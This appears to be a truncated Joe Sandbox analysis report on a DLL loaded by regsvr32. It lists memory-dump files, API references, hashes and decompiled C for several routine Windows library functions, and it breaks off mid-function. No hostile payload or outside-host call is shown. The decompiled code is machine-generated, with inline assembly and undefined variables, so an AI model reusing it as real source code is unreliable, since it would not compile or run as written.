0x100172d3
0x00000000
0x00000000
0x100172ad
0x100172af
0x100172b4
0x1001731c
0x1001731c
0x1001731e
0x00000000
0x00000000
0x100172da
0x100172dd
0x100172e3
0x100172e5
0x100172e8
0x100172ef
0x100172f2
0x100172f7
0x100172f7
0x00000000
0x00000000
0x10017328
0x1001732b
0x10017330
0x10017336
0x10017337
0x1001733c
0x1001733e
0x10017343
0x10017345
0x1001734b
0x1001734c
0x10017351
0x10017353
0x10017354
0x10017354
0x10017357
0x1001735c
0x10017362
0x10017363
0x10017364
0x10017366
0x1001736e
0x10017376
0x10017378
0x10017380
0x10017382
0x1001738a
0x10017391
0x10017397
0x10017399
0x1001739e
0x100173a4
0x100173a6
0x100173a7
0x100173a9
0x100173ae
0x100173b3
0x100173b6
0x100173ba
0x100173bb
0x100173bd
0x00000000
0x00000000
0x10017294
0x10017323
0x10017323
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 1001725A
SysStringByteLen.OLEAUT32(?), ref: 100172DD
VariantClear.OLEAUT32(?), ref: 10017300

Strings

`, xrefs: 10017279

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteClearH_prologStringVariant
String ID: `
API String ID: 2994549436-2679148245
Opcode ID: edb1be8137098606cef3899086d1fb2bc68e49a380f2e8c0868b54353c2f49b5
Instruction ID: c1945b58384d629f4e738519608f235e36f2ad38869650386e34208afccfd2b2
Opcode Fuzzy Hash: edb1be8137098606cef3899086d1fb2bc68e49a380f2e8c0868b54353c2f49b5
Instruction Fuzzy Hash: 6D415A75600519AFCF05DFA4DC45AAE7BBAFF88744F004008F909AB251CB35EE91DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1004727F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1004727F(void** __ecx, char* _a4, short _a8) {
				signed int _v8;
				void** _v12;
				signed int _v16;
				short* _v20;
				short _v84;
				signed int _t47;
				signed int _t48;
				void* _t61;
				signed int* _t67;
				void* _t75;
				signed int _t81;
				short* _t84;
				signed int _t86;
				signed int _t93;
				void** _t94;
				void* _t96;

				_v12 = __ecx;
				if(__ecx[1] != 0) {
					_t67 = GlobalLock( *__ecx);
					_t47 = _t67[0];
					_v8 = 0 | _t47 == 0x0000ffff;
					if(_t47 != 0xffff) {
						_t48 =  *_t67;
					} else {
						_t48 = _t67[3];
					}
					asm("sbb esi, esi");
					_v16 = _t48 & 0x00000040;
					_t93 = ( ~_v8 & 0x00000002) + 1 << 1;
					if(_v8 == 0) {
						 *_t67 =  *_t67 | 0x00000040;
					} else {
						_t67[3] = _t67[3] | 0x00000040;
					}
					_a4 = _t93 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v84, 0x20) * 2;
					_t84 = E100470D4(_t67);
					_t75 = 0;
					_v20 = _t84;
					if(_v16 != 0) {
						_t75 = _t93 + 2 + E1001AFE5(_t84 + _t93) * 2;
					}
					_t26 = _t84 + 3; // 0x3
					_t55 = _t75 + _t26 & 0x000000fc;
					_v16 = _t75 + _t26 & 0x000000fc;
					_t86 = _t84 +  &(_a4[3]) & 0xfffffffc;
					if(_v8 == 0) {
						_t81 = _t67[2];
					} else {
						_t81 = _t67[4];
					}
					if(_a4 != _t75 && _t81 > 0) {
						E1001B7F0(_t86, _t55, _t67 - _t55 + _v12[1]);
						_t96 = _t96 + 0xc;
					}
					 *_v20 = _a8;
					E1001B7F0(_v20 + _t93,  &_v84, _a4 - _t93);
					_t94 = _v12;
					_t94[1] = _t94[1] + _t86 - _v16;
					GlobalUnlock( *_t94);
					_t94[2] = _t94[2] & 0x00000000;
					_t61 = 1;
					return _t61;
				}
				return 0;
			}

0x1004728b
0x1004728e
0x100472a1
0x100472a5
0x100472b4
0x100472b7
0x100472be
0x100472b9
0x100472b9
0x100472b9
0x100472c8
0x100472ca
0x100472d1
0x100472d6
0x100472de
0x100472d8
0x100472d8
0x100472d8
0x100472f8
0x10047301
0x10047303
0x10047305
0x1004730b
0x10047317
0x10047317
0x1004731e
0x10047322
0x10047328
0x1004732b
0x10047332
0x1004733a
0x10047334
0x10047334
0x10047334
0x10047341
0x10047353
0x10047358
0x10047358
0x10047368
0x10047372
0x10047377
0x10047382
0x10047385
0x1004738b
0x10047391
0x00000000
0x10047393
0x00000000

APIs

GlobalLock.KERNEL32 ref: 1004729B
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 100472EE
GlobalUnlock.KERNEL32(?), ref: 10047385

Strings

@, xrefs: 100472D8

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$ByteCharLockMultiUnlockWide
String ID: @
API String ID: 231414890-2766056989
Opcode ID: c2bd91d0e535d759e00a52c219f07ed49f5b8412ee7cb5153aedab914ef96ed3
Instruction ID: 4c67447f911444e672a9c28d6ed230e5330b976ee58a9dfcaf0e3a6e62b73d41
Opcode Fuzzy Hash: c2bd91d0e535d759e00a52c219f07ed49f5b8412ee7cb5153aedab914ef96ed3
Instruction Fuzzy Hash: A7410B75800216EFDB15CFA4C8819AE7BB8FF44354F248179EC19DB284D3709A46CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1006292B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E1006292B(void* __edx) {
				signed char* _v8;
				char _v12;
				int _v16;
				void _v148;
				unsigned int _t20;
				int _t26;
				signed int _t36;
				struct HINSTANCE__* _t38;
				struct HBITMAP__* _t39;
				int _t41;
				unsigned int _t43;
				void* _t47;
				signed int* _t48;
				signed int _t53;
				signed int _t57;
				void* _t58;
				void* _t60;

				_t47 = __edx;
				_t20 = GetMenuCheckMarkDimensions();
				_t41 = _t20;
				_t43 = _t20 >> 0x10;
				_v16 = _t43;
				if(_t41 > 0x20) {
					_t41 = 0x20;
				}
				asm("cdq");
				_t57 = _t41 + 0xf >> 4;
				_t53 = (_t41 - 4 - _t47 >> 1) + (_t57 << 4) - _t41;
				if(_t53 > 0xc) {
					_t53 = 0xc;
				}
				_t26 = 0x20;
				if(_t43 > _t26) {
					_v16 = _t26;
				}
				E1001AB60( &_v148, 0xff, 0x80);
				_v8 = 0x1007ad44;
				_t58 = _t57 + _t57;
				_v12 = 5;
				_t48 = _t60 + (_v16 + 0xfffffffa >> 1) * _t57 * 2 - 0x90;
				do {
					_v8 =  &(_v8[1]);
					_t36 =  !(( *_v8 & 0x000000ff) << _t53);
					_t48[0] = _t36;
					 *_t48 = _t36;
					_t48 = _t48 + _t58;
					_t16 =  &_v12;
					 *_t16 = _v12 - 1;
				} while ( *_t16 != 0);
				_t38 = CreateBitmap(_t41, _v16, 1, 1,  &_v148);
				 *0x10094b68 = _t38;
				if(_t38 == 0) {
					_t39 = LoadBitmapA(_t38, 0x7fe3);
					 *0x10094b68 = _t39;
					return _t39;
				}
				return _t38;
			}

0x1006292b
0x10062937
0x1006293d
0x10062943
0x10062949
0x1006294c
0x10062950
0x10062950
0x10062957
0x1006295a
0x10062968
0x1006296d
0x10062971
0x10062971
0x10062974
0x10062977
0x10062979
0x10062979
0x1006298d
0x1006299b
0x100629a7
0x100629a9
0x100629b0
0x100629b7
0x100629c2
0x100629c7
0x100629cb
0x100629ce
0x100629d0
0x100629d2
0x100629d2
0x100629d2
0x100629e6
0x100629f0
0x100629f6
0x100629fe
0x10062a04
0x00000000
0x10062a04
0x10062a0a

APIs

GetMenuCheckMarkDimensions.USER32 ref: 10062937
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100629E6
LoadBitmapA.USER32 ref: 100629FE

Strings

, xrefs: 10062946

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
String ID:
API String ID: 2596413745-3916222277
Opcode ID: 15d9c6aa16de4006dfb05a1162f240f094a1691a4edc5aaab6eabfe7bf8ece0a
Instruction ID: 10f709458a79b41c13cbc1cd09d3b9b60febdd8db679bf2905a9988536a109a9
Opcode Fuzzy Hash: 15d9c6aa16de4006dfb05a1162f240f094a1691a4edc5aaab6eabfe7bf8ece0a
Instruction Fuzzy Hash: FC212C71E00256AFEB10CF78CCC5BAE7BB5EB84754F064166E505EB2D1D670DA44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100486E3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E100486E3(void* __ecx, void* __eflags) {
				CHAR* _t24;
				struct HINSTANCE__* _t27;
				_Unknown_base(*)()* _t31;
				CHAR* _t38;
				void* _t39;
				void* _t41;

				E1001A9E0(0x10077bd0, _t41);
				_t38 =  *(_t41 + 0x10);
				 *_t38 =  *_t38 & 0x00000000;
				E10048780(_t41 - 0x10,  *((intOrPtr*)(_t41 + 8)));
				_t24 =  *0x1008f630; // 0x1008f644
				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
				 *(_t41 + 0x10) = _t24;
				 *(_t41 - 4) = 1;
				if(E100487EF( *((intOrPtr*)(_t41 - 0x10)), _t41 + 0x10) != 0) {
					_t27 = LoadLibraryA( *(_t41 + 0x10));
					if(_t27 == 0) {
						goto L1;
					}
					_t31 = GetProcAddress(_t27, "DllGetClassObject");
					if(_t31 == 0) {
						_t39 = 0x800401f9;
					} else {
						_t39 =  *_t31( *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t38);
					}
					L6:
					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
					E1004591E(_t41 + 0x10);
					 *(_t41 - 4) =  *(_t41 - 4) | 0xffffffff;
					E1004591E(_t41 - 0x10);
					 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
					return _t39;
				}
				L1:
				_t39 = 0x80040154;
				goto L6;
			}

0x100486e8
0x100486ef
0x100486f8
0x100486fc
0x10048701
0x10048706
0x1004870a
0x10048710
0x1004871f
0x1004872b
0x10048733
0x00000000
0x00000000
0x1004873b
0x10048743
0x10048752
0x10048745
0x1004874e
0x1004874e
0x10048757
0x10048757
0x1004875e
0x10048763
0x1004876a
0x10048775
0x1004877d
0x1004877d
0x10048721
0x10048721
0x00000000

APIs

__EH_prolog.LIBCMT ref: 100486E8

Part of subcall function 10048780: wsprintfA.USER32 ref: 100487D0

Part of subcall function 100487EF: RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 10048810
Part of subcall function 100487EF: RegOpenKeyA.ADVAPI32(?,?,00000001), ref: 10048824
Part of subcall function 100487EF: RegOpenKeyA.ADVAPI32(00000001,InProcServer32,?), ref: 1004883F
Part of subcall function 100487EF: RegQueryValueExA.ADVAPI32 ref: 10048868
Part of subcall function 100487EF: RegCloseKey.ADVAPI32(?), ref: 10048886
Part of subcall function 100487EF: RegCloseKey.ADVAPI32(00000001), ref: 1004888B
Part of subcall function 100487EF: RegCloseKey.ADVAPI32(?), ref: 10048890

LoadLibraryA.KERNEL32(?), ref: 1004872B
GetProcAddress.KERNEL32(00000000,DllGetClassObject,?,?,100486BA,?,10082200,00000000), ref: 1004873B

Strings

DllGetClassObject, xrefs: 10048735

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseOpen$AddressH_prologLibraryLoadProcQueryValuewsprintf
String ID: DllGetClassObject
API String ID: 821125782-1075368562
Opcode ID: 6277cd2cad7381a0b4d14757b0d198a83e69507694b550beefba0c92a818d334
Instruction ID: a1bfa9d941528551b691c7a892382cff17555e8fad60eb6505b53312c8ec84c1
Opcode Fuzzy Hash: 6277cd2cad7381a0b4d14757b0d198a83e69507694b550beefba0c92a818d334
Instruction Fuzzy Hash: 9111483592426AEBDB01DFA0CC55B9E7BA8FF00394F204869F811E71A0DB75EE14DB58

Uniqueness

Uniqueness Score: -1.00%

Function 1006400A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E1006400A() {
				signed short _v16;
				signed short _v20;
				char _v24;
				signed int _t6;
				intOrPtr* _t16;
				signed int _t19;

				_t6 =  *0x1008fa5c; // 0xffffffff
				if(_t6 != 0xffffffff) {
					return _t6;
				}
				_t16 = GetProcAddress(GetModuleHandleA("COMCTL32.DLL"), "DllGetVersion");
				_t19 = 0x40000;
				if(_t16 != 0) {
					E1001AB60( &_v24, 0, 0x14);
					_v24 = 0x14;
					_push( &_v24);
					if( *_t16() >= 0) {
						_t19 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
					}
				}
				 *0x1008fa5c = _t19;
				return _t19;
			}

0x10064010
0x10064018
0x10064077
0x10064077
0x10064033
0x10064035
0x1006403c
0x10064046
0x10064051
0x10064058
0x1006405d
0x1006406a
0x1006406a
0x1006405d
0x1006406c
0x00000000

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL), ref: 10064021
GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 1006402D

Strings

COMCTL32.DLL, xrefs: 1006401C
DllGetVersion, xrefs: 10064027

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: COMCTL32.DLL$DllGetVersion
API String ID: 1646373207-1518460440
Opcode ID: 7929866d657293669ca8ba28292c8a5ddb9b3fa6c511b74fc79bc5622a169b51
Instruction ID: 109af4addfab4097ee968ed2fc91dd4e884ad87acbb0d82abfc9382710462c6e
Opcode Fuzzy Hash: 7929866d657293669ca8ba28292c8a5ddb9b3fa6c511b74fc79bc5622a169b51
Instruction Fuzzy Hash: D0F0AFB2D0033A96EB10DBF99C88B9A77E8EB04764F120022FB05F3291E770C80087B5

Uniqueness

Uniqueness Score: -1.00%

Function 1001EC83 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E1001EC83() {
				signed int _v12;
				signed long long _v20;
				signed long long _v28;
				void* _t10;
				struct HINSTANCE__* _t19;

				_t19 = GetModuleHandleA("KERNEL32");
				if(_t19 == 0) {
					L6:
					_v12 =  *0x100806d0;
					_v20 =  *0x100806c8;
					asm("fsubr qword [ebp-0x10]");
					_v28 = _v20 / _v12 * _v12;
					asm("fcomp qword [0x10080518]");
					asm("fnstsw ax");
					asm("sahf");
					if(_t19 <= 0) {
						return 0;
					} else {
						_t10 = 1;
						return _t10;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x1001ec8e
0x1001ec90
0x1001eca7
0x1001ec51
0x1001ec5a
0x1001ec66
0x1001ec69
0x1001ec6f
0x1001ec75
0x1001ec77
0x1001ec78
0x1001ec82
0x1001ec7a
0x1001ec7c
0x1001ec7e
0x1001ec7e
0x1001ec92
0x1001ec98
0x1001eca0
0x00000000
0x1001eca2
0x1001eca2
0x1001eca6
0x1001eca6
0x1001eca0

APIs

GetModuleHandleA.KERNEL32(KERNEL32,1001A58F), ref: 1001EC88
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1001EC98

Strings

KERNEL32, xrefs: 1001EC83
IsProcessorFeaturePresent, xrefs: 1001EC92

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 4ffa46706d22c245faf3d61d4dc9f10af93d9967df4fcf57f52c8b34e2768372
Instruction ID: 4f86d5caae01613d2b6b14770277516c69ea9dc0ed04d6d7f60ccbfc3fffc709
Opcode Fuzzy Hash: 4ffa46706d22c245faf3d61d4dc9f10af93d9967df4fcf57f52c8b34e2768372
Instruction Fuzzy Hash: 1BC080207041476AEDC4DB774D0C76E2148FFC0782F014411B546D5090EF35C8418261

Uniqueness

Uniqueness Score: -1.00%

Function 10047D0B Relevance: 6.3, APIs: 5, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E10047D0B(intOrPtr __ecx, intOrPtr _a4, signed int _a8, char _a11, CHAR* _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				char _v268;
				void* __ebp;
				void* _t41;
				intOrPtr _t43;
				void* _t46;
				signed int _t54;
				CHAR* _t56;
				int _t66;
				CHAR* _t73;
				signed int _t76;
				void* _t77;
				void* _t79;
				void* _t80;

				_t76 = _a8 << 2;
				_v8 = __ecx;
				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + _t76)) - 8)) != 0) {
					_t73 = E10045D4E(_a4, _t80, 0x104);
					lstrcpyA(_t73,  *( *((intOrPtr*)(_v8 + 8)) + _t76));
					_t41 = E10066C2D(_t73, 0, 0);
					_t77 = 1;
					_t79 = _t77 - _t41 + lstrlenA(_t73);
					_t43 = _a16;
					__eflags = _t79 - _t43;
					if(_t79 != _t43) {
						L5:
